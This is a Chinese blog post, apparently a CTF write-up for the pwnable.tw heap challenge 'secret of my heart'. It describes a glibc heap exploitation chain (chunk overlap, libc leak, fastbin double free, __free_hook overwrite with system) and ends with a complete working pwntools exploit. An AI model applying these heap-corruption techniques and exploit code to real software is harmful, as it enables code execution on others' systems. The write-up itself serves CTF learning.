【tw】secret of my heart(2)

最新推荐文章于 2023-04-03 15:11:17 发布
最新推荐文章于 2023-04-03 15:11:17 发布
阅读量192 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/113920167
版权

本题另一个思路。

程序

程序已经分析过一次了。见链接

思路

这是在看雪上学到的一个思路。参考链接
这是另一种稍微简单一点的构造堆重叠的方法。

  • 1.首先布置一下堆块,完成堆块合并,这里比较简单:
add(0xf8,'123','/bin/sh\x00') #0
add(0x68,'123','/bin/sh\x00') #1
add(0xf8,'123','/bin/sh\x00') #2
add(0x68,'123','/bin/sh\x00') #3
add(0x68,'123','123') #4
remove(1)
remove(0)
add(0x68,'123','/bin/sh\x00'+'a'*0x58+p64(0x170)) #0
remove(2)

在这里插入图片描述

  • 2.申请 = #1 size 大小的 chunk,此时 main_arena 地址在 #0 中,show(#0) 完成泄漏 libc.
add(0xf8,'123','/bin/sh\x00') #1
show(0)
  • 3.继续从合并的 chunk 中申请和 #0 同样大小的 chunk,此时堆块重叠,制造 double free.
add(0x68,'123','123') #2 same as #0
# double free
remove(0)
remove(3)
remove(2)

此时 bins 中只剩原来触发合并的 0x100 的 chunk #2 在 unsorted bin 中。

  • 4.然后就是这次学到的重点,因为 free_hook 上方没有合适的 size 来通过内存错位伪造 chunk,但是在 free_hook -0xb58 处存在一个数值,可以作为 top chunk 的 size,因为通过 double free 申请到 malloc_hook 上的 chunk 大小不能覆盖到 top chunk 的值,所以通过这个 chunk 先控制 fastbin 0x70 的链表头指向附近的地址并且布置好 size,形成如下的效果,然后再申请到的 chunk 就可以修改 top chunk:
add(0x68,'123',p64(malloc_hook - 0xb))
add(0x68,'123','123')
add(0x68,'123','123')
add(0x68,'123','\x00' * 0x1b + p64(0) + p64(0x70) * 3 + p64(malloc_hook+0x20))
add(0x68,'123','\x00' * 0x38 + p64(free_hook-0xb58))

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
成功修改:
在这里插入图片描述
然后就是计算一下,分配到 free_hook 并改为 system:

# 0x12 * 0xa0 = 0xb40  然后还有之前 unsorted bin 中剩下的chunk,一共 19 个
for i in range(0,19):
    add(0x90,'123','123')
add(0x90,'123','a'*8+p64(system))
sl('3')
ru('Index')
sl('1')
完整exp
#encoding=utf-8
from pwn import *

p = process("./secret_of_my_heart")
# p = remote("chall.pwnable.tw", 10302)
elf = ELF("./secret_of_my_heart")
# libc = ELF("./libc_64.so.6")
libc = elf.libc

context(log_level = 'debug')
DEBUG = 0
if DEBUG:
    gdb.attach(p, 
    ''' 
    b *0x08048935
    c
    ''')

def dbg():
    gdb.attach(p)
    pause()

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num                :p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\x00')) 
uu64    = lambda data               :u64(data.ljust(8, '\x00'))
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia      = lambda                    :p.interactive()

menu = "Your choice :"
def cmd(idx):
    ru(menu)
    sl(str(idx))

def add(size, name, secret):
    cmd(1)
    ru("Size of heart : ")
    sl(str(size))
    ru("Name of heart :")
    se(name)
    ru("secret of my heart :")
    se(secret)

def show(idx):
    cmd(2)
    ru("Index :")
    sl(str(idx))

def remove(idx):
    cmd(3)
    ru("Index :")
    sl(str(idx))

add(0xf8,'123','/bin/sh\x00') #0
add(0x68,'123','/bin/sh\x00') #1
add(0xf8,'123','/bin/sh\x00') #2
add(0x68,'123','/bin/sh\x00') #3
add(0x68,'123','123') #4
remove(1)
remove(0)
add(0x68,'123','/bin/sh\x00'+'a'*0x58+p64(0x170)) #0
remove(2)

add(0xf8,'123','/bin/sh\x00') #1
show(0)
ru("Secret : ")
libc_base = u64(ru("\x7f")[-6:].ljust(8, '\x00')) - 0x68 - libc.symbols['__malloc_hook']
info("libc_base", libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
free_hook=libc_base + libc.symbols['__free_hook']
system=libc_base + libc.symbols['system']

add(0x68,'123','123') #2 same as #0
# double free
remove(0)
remove(3)
remove(2)

add(0x68,'123',p64(malloc_hook - 0xb))
add(0x68,'123','123')
add(0x68,'123','123')
add(0x68,'123','\x00' * 0x1b + p64(0) + p64(0x70) * 3 + p64(malloc_hook+0x20))
add(0x68,'123','\x00' * 0x38 + p64(free_hook-0xb58))

# 0x12 * 0xa0 = 0xbe0
for i in range(0,19):
    add(0x90,'123','123')
add(0x90,'123','a'*8+p64(system))
sl('3')
ru('Index')
sl('1')
ia()

在这里插入图片描述

、皮皮鸭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
我的hexo站点主题config.yml文件配置
Laic Zhang的博客
07-13 9526
文章首发自个人博客:https://github.laiczhang.com/2019/07/06/我的hexo站点config-yml文件配置/ 声明:此配置为个人hexo博客使用,仅供参考。 Statement:This configuration is for personal use and is for informational purposes only. next主题配置文件con...
大学英语四新视野 课后习题+答案翻译 Unit1~Unit8
热门推荐
qq_53157024的博客
08-02 48万+
新视野大学英语四
BUUCTF jarvisoj_level2
、moddemod
06-12 539
exp from pwn import * context(log_level = 'debug') proc_name = './level2' p = process(proc_name) # p = remote('node3.buuoj.cn', 26643) elf = ELF(proc_name) system_addr = elf.sym['system'] main_addr = elf.sym['main'] bin_sh_str = 0x0804a024 payload = 'a'..
BUUCTF pwn 四月刷题
coco的博客
04-07 813
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
十分钟教你搭建一个漂亮的博客(二--主题的修改)
qq_45353823的博客
03-14 1130
总体效果 框架的选择(butterfly) 前面我们搭建的博客,可以看见非常的单调,那如果我们想要让他变得漂亮,自然我们是不会自己去写代码的,我们通过网上比较成熟的框架,通过修改配置文件便可以得到漂亮的视觉效果。自然我这里选择的是butterfly框架 butterfly 主题的下载 我们进入到上一篇文章所在的文件夹根目录下,进入cmd命令 输入两个命令 git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git
【推荐学习】Google让互联网资源免费到底,搜索各种资源
一路狂奔的测试生活
05-30 7206
利用Google突破封锁:下载想要的东西 第一篇 突破封锁之电子书、多媒体下载  在搜索框上输入:   "index of/ " inurl:lib  再按搜索你将进入许多图书馆,并且一定能下载自己喜欢的书籍。  在搜索框上输入:   "index of /" cnki  再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口!  在搜索框上输入:  "index of /"
使用 hexo + 主题 butterfly + Github 搭建个人博客
最新发布
凉了的凉茶的博客
04-03 6155
在新出的导航栏,找到 ssh,点击后,在新的页面点击 ssh keys 的新建钥匙,新建钥匙的 title(名称)随意起名,如:余白博客,将 id_rsa.pub 文件复制的公钥,粘贴到 key 里面,保存。,生成了一个 node安装 文件夹,以及一个 index.md ,把它复制一份放在 _posts 可以在首页看到。标题 Title 可以任意,如凉茶小栈,将刚才复制的 ssh 粘贴到 Key 中,点击 Add SSH key。下面的一些图片用的图床,你们可以可以相对路径的图片试试。
大学英语四级单词
youngerhao的专栏
11-16 18万+
a [Ai, 4, 1n, 4n] art.一(个);任何一(个);每一(个) abandon [4'b1nd4n] vt.离弃,丢弃;遗弃,抛弃;放弃 ability [4'biliti] n.能力,本领;才能,才智 able ['Aib4l] a.能够…的,得以…的;有才干的 aboard [4'b3:d] prep. adv.在(船、飞机、车)上,上船等 about [4'b2ut
AR as a civil right
weixin_42786150的博客
02-16 6309
augmentd reality
NSR15TW1T2的技术参数
12-11
产品型号:NSR15TW1T2反向峰值电压(V):15反向雪崩电压典型值(V):20最大平均正向电流(mA):30最大全周期正向压降1:415mV @ 1.0mA最大全周期正向压降2:680mV @10mA封装/温度(℃):SOT-363/-65~150描述:三肖特基二极管价格...
TW8836B2.zip
05-21
《液晶屏编码解码芯片TW8836的全功能程序解析》 在现代电子设备中,液晶显示屏(LCD)的使用已经非常普遍,而其背后的驱动与控制技术则至关重要。TECHWELL公司的TW8836是一款专门用于液晶屏编码解码的高性能芯片,...
TW系列2.X编辑软件
10-23
TW系列2.X编辑软件深度解析》 在信息化飞速发展的今天,电子显示屏已经成为信息传播的重要载体,而相应的编辑软件则是实现这一功能的关键工具。本文将深入探讨“TW系列2.X编辑软件”,揭示其在电子显示屏编辑领域...
FAQ-TW_Terminal2
04-01
A) To read or write registers, TW_Terminal2 writes command and waits for the response for Line Delay in Setup window. If it cannot get correct response during timeout, this message will be shown. ...
基于jQuery页面翻转特效.rar_two2tw_基于jQuery页面翻转特效
09-24
【标题】"基于jQuery页面翻转特效.rar_two2tw_基于jQuery页面翻转特效" 提供的信息表明,这个压缩包包含了一个使用jQuery实现的页面翻转特效。在网页设计和开发中,动态视觉效果常常能提升用户体验,其中页面翻转...
【pwn】orw
weixin_43960998的博客
06-19 1777
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
【攻防世界】greeting-150
weixin_43960998的博客
03-28 1305
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
【攻防世界】Recho
weixin_43960998的博客
03-28 677
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 541
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcache 的 double free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值